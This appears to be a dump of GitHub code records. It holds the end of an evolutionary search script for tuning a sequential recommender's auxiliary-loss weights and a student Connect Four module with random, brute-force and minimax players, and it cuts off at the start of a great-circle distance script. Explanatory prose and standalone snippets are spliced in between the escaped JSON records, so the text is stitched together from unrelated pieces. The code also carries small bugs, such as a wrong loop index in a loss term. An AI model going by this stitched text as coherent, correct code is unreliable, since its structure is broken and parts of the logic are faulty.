required=True)\n parser.add_argument('--batch_size', default=256, type=int)\n parser.add_argument('--lr', default=0.001, type=float)\n parser.add_argument('--maxlen', default=50, type=int)\n parser.add_argument('--hidden_units', default=256, type=int)\n parser.add_argument('--num_layers', default=4, type=int)\n parser.add_argument('--num_heads', default=1, type=int)\n parser.add_argument('--dropout', default=0.5, type=float)\n parser.add_argument('--clip', default=5.0, type=float)\n parser.add_argument('--warmup_steps_rate', default=0.1, type=float)\n parser.add_argument('--sample_size', default=100, type=int)\n parser.add_argument('--device', default='cuda', type=str)\n parser.add_argument('--inference_only', default=False, type=str2bool)\n parser.add_argument('--state_dict_path', default=None, type=str)\n parser.add_argument('--is_save', default=False, type=str2bool)\n parser.add_argument('--weight_decay', default=0, type=float)\n 
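The str2bool helper defined above exists because argparse's bare type=bool treats every non-empty string — including 'false' — as truthy. A minimal demonstration of the difference:

import argparse

def str2bool(s):
    if s.lower() not in {'false', 'true'}:
        raise ValueError('Not a valid boolean string')
    return s.lower() == 'true'

parser = argparse.ArgumentParser()
parser.add_argument('--naive', type=bool, default=False)     # bool('false') is True
parser.add_argument('--safe', type=str2bool, default=False)  # parsed correctly
opts = parser.parse_args(['--naive', 'false', '--safe', 'false'])
print(opts.naive, opts.safe)  # -> True False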
parser.add_argument('--eval_interval', default=20, type=int)\n parser.add_argument('--eval_batch_size', default=512, type=int)\n parser.add_argument('--eval_set', default=-1, type=int) # number of the test set, negative value means all. It is ok to set it small to accelerate when searching\n\n parser.add_argument('--warmup_epochs', help='number of epochs when warmup training', default=200, type=int)\n parser.add_argument('--search_epochs', help='number of epochs when searching best lambdas', default=500, type=int)\n parser.add_argument('--population_num', help='population number', type=int, default=100)\n parser.add_argument('--select_num', help='select topk candidates', type=int, default=50)\n parser.add_argument('--m_prob', help='probability of crossover and mutation during evolution process', type=float, default=0.1)\n parser.add_argument('--crossover_num', help='crossover number', type=int, default=25)\n parser.add_argument('--mutation_num', help='mutation number', type=int, default=25)\n parser.add_argument('--seed', help='random seed during evolution', type=int, default=2022)\n parser.add_argument('--scale_factor', help='scale factor', type=float, default=0.5)\n parser.add_argument('--scale_decay_rate', help='scale decay rate', type=float, default=0.5)\n\n args = parser.parse_args()\n\n print(args)\n return args\n\nclass SearcherEvolution():\n def __init__(self, args):\n self.args = args\n # information that evolutional algorithm needs\n self.select_num = args.select_num\n self.warmup_epochs = args.warmup_epochs\n self.search_epochs = args.search_epochs\n self.population_num = args.population_num\n self.m_prob = args.m_prob\n self.crossover_num = args.crossover_num\n self.mutation_num = args.mutation_num\n self.num_layers = args.num_layers\n # generate dataset\n self.dataset = data_partition(args.dataset)\n\n [user_train, user_valid, user_test, usernum, itemnum] = self.dataset\n negative_sampler = PopularSampler(user_train, user_valid, user_test, usernum, itemnum, args.sample_size)\n num_batch = len(user_train) // args.batch_size # tail? 
+ ((len(user_train) % args.batch_size) != 0)\n \n # sampler = WarpSampler(user_train, usernum, itemnum, batch_size=args.batch_size, maxlen=args.maxlen, n_workers=3)\n warp_dataset = WarpDataset(user_train, usernum, itemnum, args.maxlen)\n # train_sampler = torch.utils.data.distributed.DistributedSampler(warp_dataset)\n self.dataloader = DataLoader(warp_dataset, batch_size=args.batch_size, num_workers=4, shuffle=True)\n val_dataset = EvalDataset(user_train, user_valid, user_test, usernum, itemnum, args.maxlen, negative_sampler, mode='val', eval_set=args.eval_set)\n self.val_loader = DataLoader(val_dataset, batch_size=args.eval_batch_size, num_workers=4, shuffle=False)\n test_dataset = EvalDataset(user_train, user_valid, user_test, usernum, itemnum, args.maxlen, negative_sampler, mode='test', eval_set=args.eval_set)\n self.test_loader = DataLoader(test_dataset, batch_size=args.eval_batch_size, num_workers=4, shuffle=False)\n\n # search space\n self.block_choice = [0, 1]\n self.rec_choice = [0, 0.0001, 0.0005, 0.001, 0.005, 0.01]\n self.ind_choice = [0, 0.0001, 0.0005, 0.001, 0.0015, 0.002]\n self.rec_weights = [0 for _ in range(args.num_layers)]\n self.ind_weights = [0 for _ in range(args.num_layers)]\n self.lambda_choice = self.rec_choice + self.ind_choice\n\n # generate model\n self.model = SuperSASRecModel(usernum, itemnum, self.rec_choice, self.ind_choice, args).to(args.device)\n\n for name, param in self.model.named_parameters():\n try:\n torch.nn.init.xavier_normal_(param.data)\n except:\n pass # just ignore those failed init layers\n\n self.loss = torch.nn.BCEWithLogitsLoss()\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=args.lr, betas=(0.9, 0.999), weight_decay=args.weight_decay)\n\n # population info\n self.memory = []\n self.epoch = 0\n self.candidates = []\n self.keep_top_k = {self.select_num: []}\n self.vis_dict = {}\n\n # scale factor\n self.scale_factor = args.scale_factor\n self.scale_decay_rate = args.scale_decay_rate\n\n def _get_weight(self, choices, prob):\n '''\n prob is a value from [0, 1], means the weight for the auxiliary loss\n choices is actually a sampled point of the function that measures the loss weight and the prob\n after the prob is given, we get the final result through the sampled choices interpolation\n '''\n # prob = min(prob, 1-1e-10) # Prevent bugs, but this step is not required in probability\n split_value = 1 / (len(choices) - 1)\n idx = 0\n while(prob > split_value):\n idx += 1\n prob -= split_value\n relate_distance = prob / split_value\n return choices[idx] * (1 - relate_distance) + choices[idx + 1] * relate_distance\n\n def _set_choice(self, cand):\n # change cand to weight\n num_layers = int(len(cand) / 2)\n block_cand = []\n for i in range(0, 2 * num_layers, 2):\n rec = cand[i]\n ind = cand[i + 1]\n rec_weight = self._get_weight(self.rec_choice, rec)\n ind_weight = self._get_weight(self.ind_choice, ind)\n self.rec_weights[int(i/2)] = rec_weight\n self.ind_weights[int(i/2)] = ind_weight\n block_cand.append(rec_weight)\n block_cand.append(ind_weight)\n # set block\n self.model.set_choice(np.array(block_cand))\n\n def sample_random(self):\n res = list()\n for _ in range(self.args.num_layers):\n res.append(random.random())\n res.append(random.random())\n return res\n\n def stack_random_cand(self, random_func, *, batch_size=10):\n while True:\n cands = [random_func() for _ in range(batch_size)]\n for cand in cands:\n if str(cand) not in self.vis_dict:\n self.vis_dict[str(cand)] = {}\n info = self.vis_dict[str(cand)]\n for cand in 
cands:\n yield cand\n \n def get_cand_auc(self, cand):\n self._set_choice(cand)\n self.model.eval()\n t_valid, AUC = evaluate_loader(self.model, self.val_loader, self.args, 'val', ks=[10])\n self.vis_dict[str(cand)]['V_NDCG'] = float(t_valid[0][10])\n self.vis_dict[str(cand)]['V_HR'] = float(t_valid[1][10])\n self.vis_dict[str(cand)]['V_AUC'] = float(AUC)\n return float(AUC)\n\n def check_cand(self, cand):\n # assert isinstance(cand, list) and len(cand) == (self.num_layers * 2)\n if str(cand) not in self.vis_dict:\n self.vis_dict[str(cand)] = {}\n info = self.vis_dict[str(cand)]\n if 'visited' in info:\n return False\n info['visited'] = True\n info['auc'] = float(self.get_cand_auc(cand))\n return True\n \n def get_random(self, population_num):\n '''\n sample random candidates\n '''\n print('random select ......')\n cand_iter = self.stack_random_cand(self.sample_random)\n max_iter = (population_num - len(self.candidates) + 1) * 50\n while len(self.candidates) < population_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n self.candidates.append(cand)\n print(f'random {len(self.candidates)} / {population_num}')\n print(f'sample over ...... random_num = {len(self.candidates)}')\n\n def update_top_k(self, candidates, *, k, key, reverse=True):\n assert k in self.keep_top_k\n print(f'select top-{k} ...')\n t = self.keep_top_k[k]\n t += candidates\n t.sort(key=key, reverse=reverse)\n self.keep_top_k[k] = t[:k]\n\n def show_top_k(self, k):\n assert k in self.keep_top_k\n t = self.keep_top_k[k]\n for cand in t:\n info = self.vis_dict[str(cand)]\n if 'test_auc' not in info:\n self._set_choice(cand)\n self.model.eval()\n t_test, AUC = evaluate_loader(self.model, self.test_loader, self.args, mode='test', ks=[10])\n info['T_NDCG'] = float(t_test[0][10])\n info['T_HR'] = float(t_test[1][10])\n info['T_AUC'] = float(AUC)\n info['test_auc'] = float(AUC)\n \n def get_crossover(self, k, crossover_num):\n assert k in self.keep_top_k\n print('crossover ......')\n res = []\n max_iter = crossover_num * 10\n def random_func():\n c1 = choice(self.keep_top_k[k])\n c2 = choice(self.keep_top_k[k])\n return list(choice([i,j]) for i, j in zip(c1, c2))\n cand_iter = self.stack_random_cand(random_func)\n while len(res) < crossover_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n res.append(cand)\n print(f\"crossover {len(res)} / {crossover_num}\")\n print(f\"crossover over ...... crossover_num = {len(res)}\")\n return res\n \n def get_mutation(self, k, mutation_num, m_prob):\n '''\n mutation\n '''\n assert k in self.keep_top_k\n print('mutation ......')\n res = []\n max_iter = mutation_num * 10\n def random_func():\n # get top k candidates\n cand = list(choice(self.keep_top_k[k]))\n for i in range(self.num_layers * 2):\n if np.random.random_sample() < m_prob:\n cand2 = list(choice(self.keep_top_k[k]))\n cand3 = list(choice(self.keep_top_k[k]))\n mutation_value = cand[i] + self.scale_factor * (cand2[i] - cand3[i])\n cand[i] = min(1 - 1e-10, max(1e-10, mutation_value))\n return cand\n cand_iter = self.stack_random_cand(random_func)\n while len(res) < mutation_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n res.append(cand)\n print(f'mutation {len(res)} / {mutation_num}')\n print(f\"mutation over ...... 
mutation_num = {len(res)}\")\n return res\n\n def _train_warmup(self):\n [user_train, user_valid, user_test, usernum, itemnum] = self.dataset\n for epoch in range(self.args.warmup_epochs):\n self.model.train()\n cand = self.sample_random()\n self._set_choice(cand)\n with tqdm.tqdm(self.dataloader) as t:\n for batch, _ in t:\n t.set_description(f\"Warmup: epoch {epoch + 1} / {self.args.warmup_epochs} \")\n u, seq, dec, pos, neg = batch # tuples to ndarray\n u, seq, dec, pos, neg = np.array(u), np.array(seq), np.array(dec), np.array(pos), np.array(neg)\n pos_logits, neg_logits, encoder_layer_input, decoder_layer_output, rec_layer_ind = self.model(u, seq, dec, pos, neg)\n pos_labels, neg_labels = torch.ones(pos_logits.shape, device=self.args.device), torch.zeros(neg_logits.shape, device=self.args.device)\n # print(\"\\neye ball check raw_logits:\"); print(pos_logits); print(neg_logits) # check pos_logits > 0, neg_logits < 0\n # print(pos_logits, neg_logits)\n self.optimizer.zero_grad()\n indices = np.where(pos != 0)\n loss = self.loss(pos_logits[indices], pos_labels[indices])\n loss += self.loss(neg_logits[indices], neg_labels[indices])\n # recon\n if len(encoder_layer_input) != 0 and len(encoder_layer_input) == len(decoder_layer_output):\n # MSE loss calculate the reconstruction loss\n for i in range(len(encoder_layer_input)):\n loss += self.rec_weights[i] * F.mse_loss(encoder_layer_input[i], decoder_layer_output[i])\n \n if self.args.num_heads > 1:\n # ind loss\n # generate label\n batch_size = rec_layer_ind[0].shape[0]\n label = torch.arange(self.args.num_heads)\n label = torch.tile(label, [batch_size * self.args.maxlen, 1]).to(self.args.device)\n # calculate loss\n for l in range(len(rec_layer_ind)):\n # rec_layer_ind[i] shape: [batch_size, maxlen, num_head, num_head]\n loss += self.ind_weights[i] * F.nll_loss(rec_layer_ind[l].view(batch_size * self.args.maxlen, self.args.num_heads, self.args.num_heads), label)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args.clip)\n self.optimizer.step()\n\n t.set_postfix(loss=loss.item())\n \n def search(self):\n print(f\"population_num = {self.population_num}, select_num = {self.select_num}, mutation_num = {self.mutation_num}, crossover_num = {self.crossover_num}\")\n print(f\"Now warmup supernet ... The warmup epoch is {self.warmup_epochs}\")\n self._train_warmup()\n # save checkpoint\n os.makedirs('./checkpoint', exist_ok=True)\n torch.save(self.model.state_dict(), './checkpoint/super.pth')\n print(f\"Now search the candidates ... 
The max epoch is {self.search_epochs}\")\n # init population\n self.get_random(self.population_num)\n with trange(self.search_epochs) as t:\n for s_epoch in t:\n self.epoch += 1\n self.memory.append([])\n for cand in self.candidates:\n self.memory[-1].append(cand)\n\n # update top k\n self.update_top_k(\n self.candidates, k=self.select_num, key=lambda x:self.vis_dict[str(x)]['auc']\n )\n # now get mutation and crossover\n mutation = self.get_mutation(\n self.select_num,\n self.mutation_num,\n self.m_prob\n )\n crossover = self.get_crossover(\n self.select_num,\n self.crossover_num\n )\n self.candidates = mutation + crossover\n self.get_random(self.population_num)\n # save top_k\n os.makedirs('./res', exist_ok=True)\n with jsonlines.open(f'./res/res_{self.args.dataset}_lr_{self.args.lr}_reg_{self.args.weight_decay}_warm_{self.args.warmup_epochs}_search_{self.args.search_epochs}_layers_{self.args.num_layers}_select_{self.args.select_num}_population_{self.args.population_num}_cross_{self.args.crossover_num}_mutation_{self.args.mutation_num}.jsonl', mode='w') as writer:\n t = self.keep_top_k[self.select_num]\n for cand in t:\n info = self.vis_dict[str(cand)]\n self._set_choice(cand)\n info['cand'] = str(cand)\n info['rec'] = str(self.rec_weights)\n info['ind'] = str(self.ind_weights)\n writer.write(info)\n\ndef set_rng_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\ndef main():\n args = parse_args()\n set_rng_seed(args.seed)\n Searcher = SearcherEvolution(args)\n Searcher.search()\n\nif __name__ == \"__main__\":\n main()","repo_name":"defineZYP/ADT","sub_path":"sasrec/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":17544,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"42823203833","text":"# Author: Ruslan Huhko\n# For: CS Capstone - Fall 2021\n# Advisor: Dr. 
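The _get_weight routine above treats its choices list as evenly spaced knots over [0, 1] and linearly interpolates between the two nearest knots. A small standalone check of that behaviour, reusing the rec_choice values from the searcher:

def get_weight(choices, prob):
    """Piecewise-linear interpolation over evenly spaced knots in [0, 1]."""
    split_value = 1 / (len(choices) - 1)
    idx = 0
    while prob > split_value:
        idx += 1
        prob -= split_value
    relative_distance = prob / split_value
    return choices[idx] * (1 - relative_distance) + choices[idx + 1] * relative_distance

rec_choice = [0, 0.0001, 0.0005, 0.001, 0.005, 0.01]
print(get_weight(rec_choice, 0.0))  # 0.0     (first knot)
print(get_weight(rec_choice, 0.1))  # 5e-05   (halfway between knots 0 and 0.0001)
print(get_weight(rec_choice, 0.2))  # 0.0001  (second knot)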
Michael J Reale\n# Contains gameplay algorithms:\n# - Random\n# - BruteForce\n# - Minimax\n\nimport random\nimport numpy as np\nimport truthtable\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport gameboard\nimport math\n\n\nclass Algorithm:\n\n def __init__(self, gameboard):\n self.gameboard = gameboard\n\n def random(self):\n # randomly selects one of the available locations until four in a row exists\n # returns int selection\n posList = self.checkAvailPos(self.gameboard, as_tuple=False)\n return random.choice(posList)\n\n def checkAvailPos(self, gameboard, as_tuple):\n # Returns list of available columns to choose from [0-6]\n # Or returns list of position coordinates held by either player\n posList = []\n rList = []\n yList = []\n for c in range(gameboard.shape[1]):\n for r in reversed(range(gameboard.shape[0])):\n if gameboard[r, c].isdigit():\n posList.append(int(c))\n break\n elif gameboard[r, c] == 'R':\n rList.append((r, c))\n elif gameboard[r, c] == 'Y':\n yList.append((r, c))\n\n if as_tuple:\n # Returns list of tuples for positions\n return rList, yList\n else:\n return posList\n\n def bruteForce(self, player):\n # Driver Code for Brute Force\n # Determines next position based on the least moves necessary to achieve a winning combination\n # Returns selection 0-6\n \"\"\"\n # Code using the Bruteforce Class\n bruteforce = BruteForce(self.gameboard)\n bruteforce.main(player)\n\n # For debugging\n bruteforce.printGraph()\n print(nx.info(bruteforce.graph))\n\n bruteforce.clearGraph()\n selection = bruteforce.returnSelection()\n # print(selection, \": Player\", player.playercolor)\n \"\"\"\n\n # Code using the bruteforce minimax\n bruteforce = Minimax(self.gameboard, depth=math.inf)\n playercolor = player.playercolor\n\n if playercolor == 'R':\n col, weight = bruteforce.bruteForce(self.gameboard, True, False)\n elif playercolor == 'Y':\n col, weight = bruteforce.bruteForce(self.gameboard, False, False)\n\n selection = col\n\n return selection\n\n def minimax(self, player):\n # Driver Code for Minimax\n # Returns selection 0-6\n minimax = Minimax(self.gameboard, depth=4)\n minimax.main(player)\n\n selection = minimax.returnSelection()\n return selection\n\n\nclass Minimax(Algorithm):\n\n def __init__(self, cur_gameboard, depth):\n self.gameboard = cur_gameboard.copy()\n self.depth = depth\n self.selection = None\n self.alpha = -math.inf\n self.beta = math.inf\n\n def getScore(self, gameboard, isMaximizingPlayer):\n # Sets weights/scores for nodes\n # Code recycled from truthtable.py\n\n if isMaximizingPlayer:\n player = 'R'\n opp_player = 'Y'\n elif not isMaximizingPlayer:\n player = 'Y'\n opp_player = 'R'\n\n score = 0\n\n templist = []\n\n # all horizontal positions\n for r in range(6):\n for c in range(4):\n horizontal = gameboard[r, c:(c + 4)]\n count = 0\n opp_count = 0\n for i in horizontal:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # all vertical positions\n for r in range(3):\n for c in range(7):\n vertical = gameboard[r:(r + 4), c]\n count = 0\n opp_count = 0\n for i in vertical:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # positive diagonal\n for r in range(3):\n for c in range(4):\n for i in range(4):\n truepos = 
gameboard[(r + 3 - i), (c + i)]\n templist.append(str(truepos))\n positive = np.array(templist)\n count = 0\n opp_count = 0\n for i in positive:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n templist.clear()\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # negative diagonal\n for r in range(3):\n for c in range(4):\n for i in range(4):\n truepos = gameboard[(r + i), (c + i)]\n templist.append(str(truepos))\n negative = np.array(templist)\n count = 0\n opp_count = 0\n for i in negative:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n templist.clear()\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # Add more weight to center row\n # Done manually since not training\n for r in range(3):\n vertical = gameboard[r:(r + 4), 3]\n count = 0\n opp_count = 0\n for i in vertical:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n if isMaximizingPlayer:\n return score\n elif not isMaximizingPlayer:\n return -score\n\n def recordMove(self, gameboard, player, column):\n # Records move in lowest row within given column\n # Code recycled from gameboard.py not to prevent continual creation of Gameboard objects\n\n for i in reversed(range(gameboard.shape[0])):\n if gameboard[i, column].isalpha():\n if i == 0:\n # Raises Error if the selected column is full\n raise ValueError\n else:\n continue\n else:\n gameboard[i, column] = player\n break\n return gameboard\n\n def minimax(self, board, depth, isMaximizingPlayer, alpha, beta):\n # https://www.geeksforgeeks.org/minimax-algorithm-in-game-theory-set-4-alpha-beta-pruning/\n # Red is always maximizing player\n # Yellow is always minimizing player\n\n availCol = self.checkAvailPos(board, as_tuple=False)\n if len(availCol) == 0:\n return None, None\n col = availCol[0] # Default Value\n\n if depth == 0:\n return None, self.getScore(board, isMaximizingPlayer)\n\n if isMaximizingPlayer:\n max_val = -math.inf\n for c in availCol:\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'R', c)\n opp_col, score = self.minimax(board_copy, (depth - 1), False, alpha, beta)\n if score > max_val:\n max_val = score\n col = c\n alpha = max(alpha, max_val)\n if alpha >= beta:\n break\n return col, max_val\n elif not isMaximizingPlayer:\n min_val = math.inf\n for c in availCol:\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'Y', c)\n opp_col, score = self.minimax(board_copy, (depth - 1), True, alpha, beta)\n if score < min_val:\n min_val = score\n col = c\n beta = min(beta, min_val)\n if alpha >= beta:\n break\n return col, min_val\n\n def bruteForce(self, board, isMaximizingPlayer, isFinalMove):\n # BruteForce Approach\n # Basically Minimax without depth limit, and alpha-beta pruning\n # Red is always maximizing player\n # Yellow is always minimizing player\n\n availCol = self.checkAvailPos(board, as_tuple=False)\n\n if isFinalMove:\n return None, self.getScore(board, isMaximizingPlayer)\n\n if len(availCol) == 0:\n # Board is complete\n return None, self.getScore(board, isMaximizingPlayer)\n col = availCol[0] # Default Value\n\n if isMaximizingPlayer:\n 
max_val = -math.inf\n for col in range(len(availCol)):\n c = availCol[col]\n if col == len(availCol):\n isFinalMove = True\n else:\n isFinalMove = False\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'R', c)\n opp_col, score = self.bruteForce(board_copy, False, isFinalMove)\n if score > max_val:\n max_val = score\n col = c\n # alpha = max(alpha, max_val)\n # if alpha >= beta:\n # break\n return col, max_val\n elif not isMaximizingPlayer:\n min_val = math.inf\n for col in range(len(availCol)):\n c = availCol[col]\n if col == len(availCol):\n isFinalMove = True\n else:\n isFinalMove = False\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'Y', c)\n opp_col, score = self.bruteForce(board_copy, True, isFinalMove)\n if score < min_val:\n min_val = score\n col = c\n # beta = min(beta, min_val)\n # if alpha >= beta:\n # break\n return col, min_val\n\n def returnSelection(self):\n return self.selection\n\n def main(self, player):\n # Driver Code for this class\n playercolor = player.playercolor\n\n if playercolor == 'R':\n col, weight = self.minimax(self.gameboard, self.depth, True, self.alpha, self.beta)\n elif playercolor == 'Y':\n col, weight = self.minimax(self.gameboard, self.depth, False, self.alpha, self.beta)\n\n self.selection = col\n\n return\n\n\nclass BruteForce(Algorithm):\n\n def __init__(self, cur_gameboard):\n self.graph = nx.MultiGraph()\n self.gameboard = cur_gameboard\n self.truthtable = truthtable.TruthTable()\n self.gameboardTemplate = np.arange(42).reshape(6, 7)\n self.selection = None\n self.player = None\n self.board = gameboard.GameBoard()\n\n # Begins with each player having own array of potential winning combinations\n self.rTruth = self.truthtable.returntruthtable()\n self.yTruth = self.truthtable.returntruthtable()\n self.truthTableArray = self.truthtable.returntruthtable()\n\n def choosePath(self):\n # Iterates over graph to find the best path\n # Returns list of nodes for path\n possible_paths = []\n\n # Traverse possible paths\n for path_array in self.truthTableArray:\n # connvert path array into list\n path = path_array.tolist()\n\n try:\n if nx.is_path(self.graph, path):\n possible_paths.append(path)\n except KeyError:\n pass\n\n # find the weights for the paths\n weights = []\n for path in possible_paths:\n weights.append(nx.path_weight(self.graph, path, weight=\"weight\"))\n\n # Choose the path with the lowest weight\n # If multiple paths with lowest weight, chooses the first to be tested\n lowest_weight = 100\n lowest_weight_pos = None\n for i in range(len(weights)):\n weight = weights[i]\n if weight < lowest_weight:\n lowest_weight = weight\n lowest_weight_pos = i\n\n # Choose path with the lowest weight\n best_path = possible_paths[lowest_weight_pos]\n\n return best_path\n\n def returnSelection(self):\n # Returns Next Selection\n # Takes position number and converts to column number\n for r in range(self.gameboardTemplate.shape[0]):\n for c in range(self.gameboardTemplate.shape[1]):\n if self.selection == self.gameboardTemplate[r, c]:\n return c\n return None\n\n def curPositions(self, curList, oppList):\n # Converts list of tuples into list of positions [0-41]\n curPos = []\n\n for pos in curList:\n r, c = pos\n curPos.append(self.gameboardTemplate[r, c])\n # List of Positions taken by opponent\n oppPos = []\n for pos in oppList:\n r, c = pos\n oppPos.append(self.gameboardTemplate[r, c])\n\n return curPos, oppPos\n\n def 
getNextAvailPos(self, board):\n # Get next available positions\n # If column is full, sets 9 for row\n # Returns array of coordinates for next available positions\n nextAvailPos = np.zeros((board.shape[1], 2), dtype=int)\n for c in range(board.shape[1]):\n nextAvailPos[c, 1] = c\n for r in range(board.shape[0]):\n if board[r, c].isalpha():\n if r == 0:\n # Column is full\n nextAvailPos[c, 0] = 9 # Number is out of bounds\n break\n else:\n if nextAvailPos[c, 0] < r:\n nextAvailPos[c, 0] = r\n return nextAvailPos\n\n def takenByOpp(self, pos, oppPosList):\n # Checks if position in question is an available option\n for opp in oppPosList:\n if pos == opp:\n return True\n return False\n\n def adjacentPositions(self, templatePosNumber):\n # returns list of all adjacent position numbers\n # Determine location of current position\n loc = np.where(self.gameboardTemplate == templatePosNumber)\n r, c = loc\n r = int(r)\n c = int(c)\n\n adjList = []\n try:\n if (c - 1) < 0:\n raise IndexError\n l = self.gameboardTemplate[r, c - 1]\n adjList.append(l)\n except IndexError:\n pass\n try:\n if ((r - 1) < 0) or ((c - 1) < 0):\n raise IndexError\n nd = self.gameboardTemplate[r - 1, c - 1]\n adjList.append(nd)\n except IndexError:\n pass\n try:\n if (r - 1) < 0:\n raise IndexError\n v = self.gameboardTemplate[r - 1, c]\n adjList.append(v)\n except IndexError:\n pass\n try:\n if (r - 1) < 0:\n raise IndexError\n pd = self.gameboardTemplate[r - 1, c + 1]\n adjList.append(pd)\n except IndexError:\n pass\n try:\n r = self.gameboardTemplate[r, c + 1]\n adjList.append(r)\n except IndexError:\n pass\n try:\n nnd = self.gameboardTemplate[r + 1, c + 1]\n adjList.append(nnd)\n except IndexError:\n pass\n try:\n nv = self.gameboardTemplate[r + 1, c]\n adjList.append(nv)\n except IndexError:\n pass\n try:\n if (c - 1) < 0:\n raise IndexError\n npd = self.gameboardTemplate[r + 1, c - 1]\n adjList.append(npd)\n except IndexError:\n pass\n\n return adjList\n\n def addEdges(self, curList, oppList):\n # Creates the graph\n # Connects the nodes for potential moves\n curPos, oppPos = self.curPositions(curList, oppList)\n\n # Connect existing nodes using curPos\n for pos in curPos:\n\n # Determine adjacent positions\n test_list = self.adjacentPositions(pos)\n\n # Check list against opponent's positions\n to_del = []\n for testpos in oppPos:\n for adj in test_list:\n if adj == testpos:\n to_del.append(adj)\n for i in to_del:\n test_list.remove(i)\n\n # Add Existing Edges\n for testpos in curPos:\n for adj in test_list:\n if adj == testpos:\n self.graph.add_edge(pos, adj, weight=0)\n\n # Create Board for potential moves\n self.board.gameboard = self.gameboard.copy()\n\n # Create Graph\n weight_counter = 0\n no_more_moves = False\n while not no_more_moves:\n weight_counter += 1\n # Get Coordinates for Next Available Positions\n nextAvailPos = self.getNextAvailPos(self.board.gameboard)\n\n # Check if all columns are full\n # Remove elements of array that are out of bounds\n to_del = []\n for i in range(nextAvailPos.shape[0]):\n r, c = nextAvailPos[i]\n if r == 9:\n to_del.append(i)\n # Break Condition\n if len(to_del) == nextAvailPos.shape[0]:\n no_more_moves = True\n break\n else:\n for i in reversed(to_del):\n nextAvailPos = np.delete(nextAvailPos, i, axis=0)\n\n # Connect Edges to Next Available Positions\n for coord in nextAvailPos:\n r, c = coord\n pos = self.gameboardTemplate[r, c]\n\n # Determine adjacent positions\n adj_list = self.adjacentPositions(pos)\n\n # Check list against opponent's positions\n to_del = []\n for 
testpos in oppPos:\n for adj in adj_list:\n if adj == testpos:\n to_del.append(adj)\n for i in to_del:\n adj_list.remove(i)\n\n # Add Edges\n for adj_pos in adj_list:\n self.graph.add_edge(pos, adj_pos, weight=weight_counter)\n\n # Update theoretical gameboard\n try:\n self.board.recordMove(self.player, c)\n except ValueError:\n pass\n\n def printGraph(self):\n # Saves and displays the graph for the next possible move\n # Uses whichever graph was saved last\n # Detailed/labelled graph requires too much memory\n nx.draw(self.graph)\n plt.savefig(\"BruteForceGraph.png\")\n plt.show()\n\n def clearGraph(self):\n # Graph Destructor Method\n # Clears the Graph\n # Not included in main method, so the printGraph method can still be called\n self.graph.clear_edges()\n\n def main(self, player):\n # Brute Force Selection\n # Determines next position based on the least moves necessary to achieve a winning combination\n self.player = player\n rPos, yPos = self.checkAvailPos(self.gameboard, as_tuple=True)\n\n # Create Graph of possible winning combinations\n if player.playercolor == 'R':\n self.addEdges(rPos, yPos)\n\n elif player.playercolor == 'Y':\n self.addEdges(yPos, rPos)\n\n # Do Bruteforce\n selected_path = self.choosePath()\n\n # Paths should already be sorted\n self.selection = selected_path[0]\n\n","repo_name":"rhuhko/connectFourCapstone21","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":20924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12652812193","text":"#!/usr/bin/env python3\n\nimport json\nimport math\n\ndef calc_gcd(latitude_1: float, longitude_1: float, latitude_2: float, longitude_2: float, radius:float) -> float:\n \"\"\"\n This function was written by Joe Wallen. 
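The Minimax class above interleaves alpha-beta pruning with Connect Four board mechanics; the pruning logic itself is easier to see on a bare game tree. A minimal, self-contained sketch with toy values, not tied to the board code:

import math

def alphabeta(node, maximizing, alpha=-math.inf, beta=math.inf):
    """node is either a numeric leaf score or a list of child nodes."""
    if not isinstance(node, list):
        return node
    if maximizing:
        value = -math.inf
        for child in node:
            value = max(value, alphabeta(child, False, alpha, beta))
            alpha = max(alpha, value)
            if alpha >= beta:
                break  # prune the remaining children
        return value
    value = math.inf
    for child in node:
        value = min(value, alphabeta(child, True, alpha, beta))
        beta = min(beta, value)
        if alpha >= beta:
            break
    return value

tree = [[3, 5], [6, [9, 1]], [1, 2]]  # alternating max/min levels
print(alphabeta(tree, True))  # -> 6, with several leaves pruned along the way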
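The calc_gcd helper above implements the spherical law of cosines, d = r * arccos(sin(lat1) * sin(lat2) + cos(lat1) * cos(lat2) * cos(|lon1 - lon2|)). A quick sanity check at Earth scale — 90 degrees of longitude along the equator should come out near a quarter of Earth's circumference, roughly 10,007 km:

import math

def calc_gcd(lat1_deg, lon1_deg, lat2_deg, lon2_deg, radius):
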